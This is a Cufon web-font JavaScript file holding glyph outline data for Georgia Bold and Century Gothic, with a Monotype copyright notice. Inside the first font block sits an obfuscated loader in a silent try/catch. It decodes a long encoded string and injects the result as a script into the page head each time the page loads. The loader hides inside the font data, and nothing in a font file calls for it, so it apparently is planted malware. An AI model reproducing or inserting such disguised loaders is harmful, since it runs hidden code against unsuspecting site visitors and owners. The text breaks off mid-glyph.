0r0,12v-39,12,-48,39,-75,63v21,27,37,57,61,81v4,3,10,4,19,5r0,13r-110,0r0,-13v32,2,14,-19,3,-34v-8,-12,-8,-11,-15,-21v-12,16,-28,28,-36,47v0,8,12,7,19,8r0,13r-71,0r0,-13v42,-14,50,-40,79,-68v-20,-25,-35,-55,-59,-76v-5,-2,-11,-4,-18,-5r0,-12r107,0r0,12v-25,-1,-13,14,-3,28v7,11,8,11,16,23","w":211},{"d":"53,-234v-20,-11,-18,-40,7,-38v31,1,30,20,47,41r23,31r-7,6v-30,-20,-45,-26,-70,-40","w":180},{"d":"118,-241v-37,-8,-58,33,-28,51v35,21,92,26,92,77v0,28,-22,44,-46,52v20,8,36,22,36,46v0,36,-38,58,-82,56v-33,-1,-64,-7,-64,-36v0,-13,10,-22,23,-22v23,0,28,25,34,43v37,8,59,-33,29,-51v-34,-21,-91,-26,-91,-77v0,-30,19,-40,46,-51v-22,-9,-38,-23,-38,-49v0,-35,41,-55,82,-54v32,1,61,7,64,36v3,25,-38,29,-45,7v-5,-7,-9,-18,-12,-28xm122,-67v19,-12,21,-52,-1,-61v-10,-7,-27,-15,-40,-20v-16,12,-23,53,1,62v12,9,26,12,40,19","w":202},{"d":"211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47xm148,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm60,-267v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":214},{"d":"165,-142v-57,5,-137,-20,-137,39r-12,0r0,-86r185,0r0,21r-128,233r-26,0","w":199},{"d":"90,-58v-4,35,20,42,51,35r0,15v-36,20,-109,21,-109,-39r0,-108r-32,0r0,-19r32,0r0,-53r57,0r0,53r50,0r0,19r-49,0r0,97","w":143},{"d":"66,-175v18,0,35,17,35,35v0,18,-17,34,-35,34v-18,0,-35,-17,-35,-34v0,-17,17,-35,35,-35xm66,-64v17,0,35,17,35,35v0,18,-17,34,-35,34v-18,0,-35,-17,-35,-34v0,-17,17,-35,35,-35","w":132},{"d":"254,53r-255,0r0,-21r255,0r0,21"},{"d":"34,-222v-3,-28,38,-43,58,-23v7,6,12,14,10,23r-27,141r-14,0v-7,-54,-22,-91,-27,-141xm68,-60v18,0,34,17,34,33v0,17,-17,32,-34,32v-17,1,-34,-14,-34,-32v0,-17,16,-33,34,-33","w":135},{"d":"188,-288v0,19,-13,33,-30,38r86,213v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,16,-16,34,-17,54v2,12,18,14,36,15r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r85,-204v-18,-5,-32,-17,-32,-39v0,-25,24,-40,50,-40v27,0,50,15,50,40xm152,-101r-36,-90r-36,90r72,0xm138,-258v16,0,23,-12,23,-29v0,-16,-7,-29,-23,-29v-15,0,-25,12,-24,29v0,16,8,29,24,29","w":272},{"d":"211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47","w":214},{"d":"91,-34v-1,16,12,19,26,21r0,13r-110,0r0,-13v15,0,26,-3,26,-19r0,-195v0,-19,-16,-26,-33,-28r0,-13r88,-4r3,3r0,235","w":123},{"d":"66,-175v18,0,35,17,35,35v0,18,-17,34,-35,34v-18,0,-35,-17,-35,-34v0,-17,17,-35,35,-35xm62,-60v45,0,50,64,22,95v-13,14,-26,25,-43,33r-8,-12v21,-12,42,-25,44,-56v-52,12,-61,-60,-15,-60","w":132},{"w":91},{"d":"141,-231r-32,-5r0,-13r250,0r0,63r-14,0v-10,-38,-47,-55,-105,-48r0,97v42,5,63,-12,68,-43r13,0r0,104r-13,0v-5,-32,-23,-52,-68,-45v7,43,-23,116,39,105v59,9,68,-32,85,-62r12,0r-4,78r-231,0r0,-14v18,-1,37,-2,37,-22r0,-68r-87,0v-19,35,-29,45,-39,76v1,13,21,12,34,14r0,14r-103,0r0,-14v24,-2,39,-14,49,-31xm178,-121r0,-113r-14,0r-64,113r78,0","w":385},{"d":"99,-256v48,0,84,29,84,74v0,47,-35,75,-85,75v-48,0,-82,-30,-82,-74v0,-46,35,-75,83,-75xm99,-120v28,0,30,-32,30,-63v0,-28,-2,-60,-30,-60v-28,0,-29,31,-30,60v0,32,2,63,30,63","w":198},{"d":"11,-14v17,-1,38,0,38,-21r0,-177v2,-20,-23,-20,-38,-24r0,-13r138,0r0,13v-17,2,-38,3,-38,23r0,176v-1,19,21,21,38,23r0,14r-138,0r0,-14","w":160},{"d":"95,-34v-1,16,13,19,26,21r0,13r-111,0r0,-13v15,0,27,-3,27,-19r0,-102v-1,-17,-14,-23,-31,-25r0,-13v29,0,64,-7,89,-2r0,140xm58,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":127},{"d":"158,-315v27,-37,80,8,35,25r-75,29r-6,-7xm236,-91v-2,-61,17,-146,-45,-145r0,-13r108,0r0,13v-63,-2,-43,91,-43,152v0,56,-44,91,-101,91v-67,0,-111,-29,-111,-91r0,-128v0,-18,-18,-22,-34,-24r0,-13r131,0r0,13v-18,1,-35,4,-35,22v0,82,-26,200,64,197v42,-2,68,-28,66,-74","w":300},{"d":"163,-144v2,-15,-15,-15,-25,-18r0,-12r73,0r0,12v-34,6,-38,47,-52,73v-15,29,-30,58,-39,91r-32,0r-65,-145v-4,-11,-17,-16,-28,-19r0,-12r109,0r0,12v-10,0,-31,5,-20,17r41,92","w":204},{"d":"151,-24v-15,26,-57,39,-85,19v2,31,29,83,-19,83v-49,0,-16,-67,-17,-104r0,-148r58,0r0,116v-6,44,50,41,62,16r0,-132r57,0r0,136v0,17,10,22,29,21r0,13v-26,13,-82,15,-85,-20","w":240},{"d":"170,-261v84,0,155,72,155,155v0,83,-71,155,-155,155v-84,0,-156,-71,-156,-155v0,-84,72,-155,156,-155xm170,34v75,0,138,-64,138,-140v0,-76,-63,-140,-138,-140v-76,0,-139,65,-139,140v0,76,63,140,139,140xm181,-40v28,0,41,-14,52,-33r12,6v-13,27,-34,47,-73,47v-53,0,-85,-30,-88,-84v-3,-67,75,-110,135,-78v3,-6,6,-11,17,-9r1,65r-12,0v-11,-28,-17,-53,-48,-53v-33,0,-43,34,-43,71v0,39,12,68,47,68","w":339},{"d":"134,-20v24,0,41,-17,52,-32r13,10v-17,27,-44,48,-86,48v-63,0,-101,-33,-101,-94v0,-56,37,-91,97,-91v57,0,88,27,85,86r-118,0v0,45,14,74,58,73xm132,-109v-1,-26,-1,-56,-26,-56v-25,0,-30,25,-30,57xm102,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":205},{"d":"178,-133v39,7,80,20,80,65v0,99,-149,60,-246,68r0,-14v18,-1,37,-3,37,-22r0,-176v1,-20,-22,-20,-37,-24r0,-13v86,7,232,-28,232,55v0,39,-34,49,-66,58r0,3xm111,-140v40,2,64,-14,65,-49v0,-35,-25,-48,-65,-44r0,93xm111,-32v21,34,86,9,77,-38v1,-42,-32,-58,-77,-53r0,91","w":272},{"d":"49,-212v1,-19,-22,-20,-37,-24r0,-13r224,0r0,66r-13,0v-10,-26,-31,-57,-73,-51r-39,0r0,98v43,5,67,-9,70,-43r14,0r0,105r-14,0v-3,-34,-25,-52,-70,-45r0,82v-1,20,20,21,36,23r0,14r-135,0r0,-14v17,-1,37,-2,37,-22r0,-176","w":241},{"d":"211,-38v0,16,12,23,29,21r0,13v-28,0,-62,7,-87,3v-1,-7,2,-18,-1,-23v-17,15,-31,29,-66,29v-66,0,-53,-76,-54,-140v-1,-16,-12,-24,-29,-24r0,-13v28,1,62,-7,87,-2r0,117v-6,45,51,40,63,15r0,-95v-1,-16,-12,-23,-30,-22r0,-13v28,0,63,-7,88,-2r0,136xm163,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm75,-267v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":243},{"d":"191,-44v-16,27,-39,50,-80,50v-62,0,-99,-33,-99,-94v0,-56,41,-90,102,-91v37,0,70,13,70,45v0,18,-9,28,-30,28v-33,0,-35,-30,-25,-53v-36,-22,-53,29,-53,69v0,36,19,70,50,70v28,0,40,-14,52,-33","w":191},{"d":"84,-257v37,0,69,27,69,66v0,39,-30,66,-68,66v-38,0,-69,-27,-69,-66v0,-39,31,-65,68,-66xm85,-138v20,-3,21,-27,21,-53v0,-26,-1,-51,-22,-53v-20,3,-21,27,-21,52v0,27,0,53,22,54xm232,-125v38,0,69,26,69,65v0,39,-31,66,-69,66v-38,1,-68,-27,-68,-66v0,-39,30,-65,68,-65xm233,-7v31,0,30,-105,-1,-105v-21,0,-22,26,-22,51v0,27,1,54,23,54xm277,-251r-208,251r-29,0r208,-251r29,0","w":316},{"d":"186,-327v15,0,28,14,28,30v0,15,-13,29,-28,29v-15,0,-28,-15,-28,-29v0,-16,13,-30,28,-30xm92,-327v15,0,28,14,28,30v0,15,-13,29,-28,29v-15,0,-29,-14,-28,-29v1,-15,12,-30,28,-30xm56,-35v-3,19,16,19,36,21r0,14r-102,0r0,-14v24,-1,37,-12,45,-31r86,-208r36,0r87,216v7,13,18,23,39,23r0,14r-136,0r0,-14v10,-1,45,-2,33,-18r-21,-51r-86,0v-7,14,-15,33,-17,48xm152,-101r-36,-90r-36,90r72,0","w":272},{"d":"217,-34v0,16,11,19,25,21r0,13r-106,0v-7,-22,27,-7,23,-32v-6,-42,17,-118,-26,-118v-19,0,-31,10,-39,22r0,94v-1,15,10,19,23,21r0,13r-107,0r0,-13v16,0,29,-4,27,-19v-5,-46,21,-124,-29,-127r0,-13v28,0,62,-7,86,-2v1,8,-2,20,1,26v17,-14,32,-31,64,-31v70,0,59,78,58,145","w":248},{"d":"125,-37v-2,22,24,22,41,24r0,13r-145,0r0,-13v18,-3,44,0,44,-23r0,-111r-44,0r0,-17v37,2,62,-9,74,-31r31,0","w":176},{"d":"12,-122v-4,-105,110,-163,202,-118v6,-6,13,-11,27,-9r1,91r-15,0v-16,-45,-29,-81,-77,-81v-52,0,-67,51,-67,111v0,62,17,110,76,110v41,0,61,-24,79,-54r15,9v-20,40,-50,69,-110,69r0,11v41,-8,59,41,23,55v-16,5,-33,6,-58,6r0,-14v19,-1,44,4,44,-14v0,-12,-12,-10,-25,-11r0,-33v-69,-9,-113,-52,-115,-128","w":257},{"d":"208,-223v-3,-11,-12,-11,-29,-13r0,-13r89,0r0,13v-46,13,-48,37,-74,77v-12,19,-27,33,-32,57r76,0r0,20r-76,0r0,44v-2,21,21,22,38,24r0,14r-137,0r0,-14v18,-1,40,-3,39,-22r0,-46r-76,0r0,-20r76,0v-20,-43,-45,-82,-70,-119v-9,-9,-20,-13,-35,-15r0,-13r138,0r0,13v-54,-2,-22,34,-7,59r27,45v31,-53,42,-59,53,-91","w":263},{"d":"12,-122v-4,-105,110,-163,202,-118v6,-6,13,-11,27,-9r1,91r-15,0v-16,-45,-29,-81,-77,-81v-52,0,-67,51,-67,111v0,62,17,110,76,110v41,0,61,-24,79,-54r15,9v-20,40,-51,70,-110,70v-80,0,-128,-49,-131,-129","w":257},{"d":"148,-256v82,0,135,48,135,130v0,62,-34,106,-83,123v-1,39,32,62,72,48r0,15v-30,13,-94,23,-119,-5v-12,-13,-20,-28,-22,-49v-71,-9,-119,-52,-119,-128v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"364,-40r-28,0r0,44r-41,0r0,-44r-84,0r0,-24r89,-106r36,0r0,104r28,0r0,26xm295,-66r0,-74r-62,74r62,0xm278,-251r-144,251r-27,0r143,-251r28,0xm104,-116v0,15,18,16,32,17r0,13r-110,0r0,-13v13,-2,33,1,33,-16r0,-102r-34,0v1,-7,-3,-18,7,-15v25,1,41,-9,50,-23r24,0v-3,44,-2,92,-2,139","w":385},{"d":"195,-328v35,0,36,59,0,59v-15,1,-28,-14,-28,-30v0,-15,14,-29,28,-29xm100,-328v15,0,28,14,28,29v0,16,-13,31,-28,30v-37,0,-34,-59,0,-59xm148,-256v82,0,135,48,135,130v0,83,-51,133,-137,133v-80,0,-134,-48,-134,-129v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"114,-179v63,0,102,30,102,91v0,62,-40,94,-103,94v-60,0,-101,-33,-101,-93v0,-60,40,-91,102,-92xm115,-9v35,0,37,-41,37,-79v0,-34,-1,-78,-37,-77v-35,1,-38,38,-38,76v0,41,1,80,38,80xm77,-234v-20,-11,-18,-40,7,-38v31,1,30,20,47,41r23,31r-7,6v-30,-20,-45,-26,-70,-40","w":228},{"d":"77,-16v56,6,90,-4,91,-50r13,0r0,66r-173,0r0,-12r101,-146r-38,0v-32,-4,-37,19,-44,41r-12,0r0,-57r163,0r0,11","w":189},{"d":"15,-123v-2,-52,73,-64,124,-51r68,0r0,19r-39,0v37,42,-9,89,-66,89v-16,0,-36,-3,-36,12v5,26,57,12,84,16v31,5,57,19,57,52v0,51,-51,63,-108,64v-50,0,-91,-7,-94,-45v-2,-26,29,-28,53,-35v-18,-6,-33,-15,-34,-35v-1,-23,25,-23,37,-33v-27,-11,-45,-22,-46,-53xm98,-79v19,0,28,-19,27,-42v-1,-24,-6,-45,-27,-45v-36,0,-34,87,0,87xm108,64v28,-3,46,-10,46,-37v0,-32,-42,-21,-79,-24v-26,21,-11,65,33,61","w":207},{"d":"334,-34v-1,16,11,19,25,21r0,13r-104,0v-6,-22,25,-7,21,-32v-7,-42,16,-115,-25,-118v-19,-2,-30,11,-37,22r0,94v0,14,9,19,21,21r0,13r-100,0v-7,-22,25,-6,21,-32v-7,-41,17,-115,-25,-118v-19,-1,-30,11,-37,22r0,94v0,14,9,19,21,21r0,13r-105,0r0,-13v16,0,27,-4,27,-19v0,-46,21,-124,-29,-127r0,-13v28,0,62,-7,86,-2v1,8,-2,19,1,25v20,-33,102,-44,116,2v18,-12,34,-32,68,-32v68,0,55,79,55,145","w":365}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-365-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("zOSyL8R;:spizVvK-8>x}O}pY+RyS8piY+Cx:sb6S]BQJT;1Y=@GHOJh@>hyHI[9J]S_-j4GJjR_-j4GJ9>`HyhyHI[8Ps3YY=@GHO%TSvhyHI[uPIh_-j4GS9S_-j4GSOSRYvhyHI[8R>N_-j4GJj>zY=@GHO>3Y=@GHOS3Y=@GHOS1Y=@GHOCvY=@GHO}xY=@GHO}nsq`K:yhyHI[vJsCyY=@GHO@nY=@GHO%hY=@GHOCuY=@GHO@yY=@GHOJyY=@GHO};Y=@GHO}FHvhyHI[1P]hyHI[1HyhyHI[uSVN_-j4GJ9S_-j4GSsC_-j4GS93_-j4GJjC_-j4GJs]_-j4GJjb_-j4GSs]_-j4GJ8}`Y=@GHO%G}=?_-j4GS4[VI{>O=}Cz~HRPw%bqj@]sYJS:L_-7,A319uv86W`D*QNi)GhxT;y+Fn?$KBp^5Iv_-j4GSsR_-j4GJjS_-j4GSO]_-j4GSjC_-j4GSIC[~vhyH9[3JTyxCyhyHI[vRyhyHI[vH{N_-j4GS9_G@yhyHI[8S]hyHI[9HyhyHI[3J1y_-j4GJT[_-j4GSOC_-j4GJTC_-j4GJ8SuY=@GHO%yY=@GHOHnY=@GHOR8Y=@GHORu]]hyHI[9H]hyHI[8H>hyHI[3S=-_-j4GJsS_-j4GSsJ?~>hyHI[vRvhyHI[uR>b_-j4GJsR_-j4GSI-pY=@GHOR9PIS_-j4GS8SvR]hyHI[8S{3Twu--YV}9Y=@GHO{njvhyHI[vHY>qb>G)%VS:C{p?jO`>_>hyHI[8HTp_-j4GSjHWY=@GHT-vY=@GHOR1sOB;Y=@GHORvY>h_-j4GSOR_-j4GJTvBY=@GHO}G7O[_-j4GJj-_-j4GSj%F-I`,}]hyHI[9Rs>QPyhyHI[3H>hyHI[9RvhyHI[1J@v_-j4GSsb_-j4GSO>+Y=@GHO}yY=@GHO{?Y=@GHO@?%uS_-j4GS8R9C]hyHI[9ROnhY=@GHOHFY=@GHO{y%y>_-j4GJ8R_-j4GSIS_-j4GS9C$S+;1~6RGLOv;zV}1zqh`wj4Q_Iy1~64QLIyG~8hvL8-;:Vh6ws}iS1?6L=vG:=Hp7F;K:sJWJ1?):T;)Y1A5P6-F-yGizjBWwT`1L+vBJ8p`_6SBJ8p`YV?G-=hv-8b9LYRBJ8p`YV?v7s]+:s]FSO]T:s-iYV?9L+;`CVp`~6bv_F%WLOp9JYb`L+ni:OpT-O?3Ls@`zsS)_1AK:jhQPxQ*:qv6s+RL:]y-wY[L:]ypzqA`")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":253,"face":{"font-family":"Georgia","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 4 8 2 5 4 5 2 2 3","ascent":"288","descent":"-72","x-height":"6","bbox":"-41.2221 -329.21 412 78.5275","underline-thickness":"21.4453","underline-position":"-20.918","unicode-range":"U+0020-U+20AC"}}));;
/*
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface © The Monotype Corporation plc. Data © The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99xm131,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":232},{"d":"193,-129v0,66,-55,72,-136,69r0,60r-26,0r0,-259r26,0r0,61v78,-3,136,2,136,69xm166,-129v0,-50,-56,-45,-109,-44r0,88v53,1,109,6,109,-44","w":213},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm42,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm114,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":193},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm52,-47r24,11r-36,66r-18,-7","w":99},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm25,-281r39,54r-25,0r-51,-54r37,0","w":72},{"d":"85,-173v0,-12,9,-22,21,-22v12,0,22,10,22,22v0,11,-10,21,-22,21v-12,0,-21,-9,-21,-21xm106,50v31,0,52,-19,52,-52r25,0v1,47,-31,77,-77,77v-41,0,-72,-24,-74,-61v-3,-63,99,-51,109,-97v0,-16,-17,-28,-36,-27v-26,0,-36,13,-38,38r-26,0v2,-38,25,-62,64,-62v35,0,62,20,62,51v3,64,-106,45,-109,97v-1,22,23,36,48,36","w":212},{"d":"103,-246v-38,4,-50,21,-50,73r0,173r-25,0r0,-175v-2,-65,20,-91,74,-95v40,-3,71,26,70,64v-1,36,-24,54,-58,59v43,5,64,33,67,75v3,57,-59,96,-110,68r0,-23v39,23,85,0,85,-45v0,-40,-28,-61,-69,-61r0,-28v33,3,60,-16,60,-44v0,-23,-20,-43,-44,-41"},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm129,-333r38,0r-52,54r-24,0","w":235},{"d":"31,-173v0,-12,10,-22,22,-22v12,0,22,10,22,22v0,11,-10,21,-22,21v-12,0,-22,-10,-22,-21xm41,75r0,-201r25,0r0,201r-25,0","w":106},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm61,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm133,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":233},{"d":"125,-129r59,58r-17,16r-58,-58r-58,58r-16,-16r58,-58r-58,-59r16,-16r58,59r58,-59r17,16","w":218},{"d":"111,-259r20,0r90,195r-23,0r-78,-168r-76,168r-23,0","w":241},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm129,-281r38,0r-52,54r-24,0","w":235},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm121,-281r38,0r-52,54r-24,0","w":218},{"d":"98,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0xm108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196","w":218},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm51,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm123,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":193},{"d":"293,-129v-1,46,-18,76,-45,101r39,48r-32,0r-26,-33v-90,57,-212,-14,-208,-115v3,-80,55,-135,135,-137v75,-2,138,62,137,136xm47,-128v-3,81,92,138,165,94r-57,-73r31,0r46,59v70,-63,23,-196,-75,-192v-64,3,-108,47,-110,112","w":313},{"d":"77,-172v-1,45,1,64,36,68r0,29v-39,0,-37,40,-36,80v1,55,-12,77,-66,74r0,-27v29,0,37,-5,36,-36v0,-63,1,-87,37,-106v-31,-16,-36,-31,-37,-79v0,-52,6,-60,-36,-62r0,-28v59,-2,67,25,66,87","w":126},{"d":"129,5v-35,-2,-59,-16,-77,-38r0,103r-24,0r0,-261r24,0r0,35v17,-23,40,-39,76,-40v54,-1,99,47,99,100v0,53,-45,102,-98,101xm202,-95v0,-45,-31,-76,-76,-77v-41,-1,-76,35,-76,77v0,46,33,77,77,77v43,0,75,-34,75,-77","w":245},{"d":"24,-271r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm24,-191r25,0r0,191r-25,0r0,-191","w":72},{"w":99},{"d":"31,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259","w":245},{"d":"195,4v-83,12,-144,-32,-161,-95r-26,0r6,-24r16,0v-1,-14,-1,-17,0,-30r-22,0r7,-25r20,0v18,-61,81,-107,162,-92r-7,24v-61,-10,-109,23,-127,68r113,0r-7,25r-112,0v-1,10,-2,19,0,30r104,0r-6,24r-93,0v16,48,69,83,133,70r0,25"},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm48,-281r38,0r-52,54r-24,0","w":72},{"d":"69,-161v-53,-25,-34,-114,34,-109v39,3,62,23,66,60r-25,0v1,-44,-81,-47,-81,-4v0,63,113,55,113,123v0,27,-25,47,-51,52v20,13,38,31,39,59v2,75,-129,68,-136,4r26,0v7,38,84,38,84,-4v0,-61,-115,-61,-115,-128v0,-30,21,-46,46,-53xm105,-54v31,-1,59,-31,37,-58v-5,-5,-25,-21,-53,-35v-32,1,-53,36,-31,61v8,9,24,20,47,32","w":221},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm33,-17v0,-12,10,-22,21,-22v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-21,-10,-21,-22","w":99},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266","w":235},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm-16,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm56,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":81},{"d":"45,-250v34,-42,79,15,117,-12r12,17v-21,20,-57,17,-80,2v-17,-3,-25,1,-37,11xm119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"9,-191r27,0r63,139r64,-139r26,0r-87,191r-5,0"},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm62,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm134,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":235},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm67,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm139,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":245},{"d":"21,-96v0,-96,129,-134,175,-60r0,-35r23,0r0,34v28,-47,109,-51,148,-10v18,20,28,44,28,74r-172,0v3,43,30,75,75,75v37,0,56,-17,70,-45r21,11v-20,62,-136,78,-170,18r0,34r-23,0r0,-35v-19,25,-40,39,-76,40v-53,1,-99,-47,-99,-101xm368,-114v-5,-60,-95,-77,-129,-31v-7,8,-12,19,-15,31r144,0xm197,-95v-1,-46,-30,-77,-76,-77v-43,0,-74,32,-75,76v-1,42,35,78,76,78v42,0,75,-35,75,-77","w":416},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"135,-271v80,0,138,59,138,137v0,81,-58,139,-138,139v-79,0,-139,-58,-139,-138v0,-80,58,-138,139,-138xm135,-14v68,0,118,-50,118,-119v0,-68,-49,-120,-118,-120v-69,0,-119,52,-119,120v0,68,50,119,119,119xm178,-55v-8,-30,7,-73,-36,-66r-40,0r0,66r-25,0r0,-159v56,1,125,-11,123,45v-1,18,-6,25,-20,35v29,8,9,56,26,79r-28,0xm175,-168v0,-32,-43,-21,-73,-23r0,47v31,-1,73,8,73,-24","w":268},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm100,-298v0,-12,9,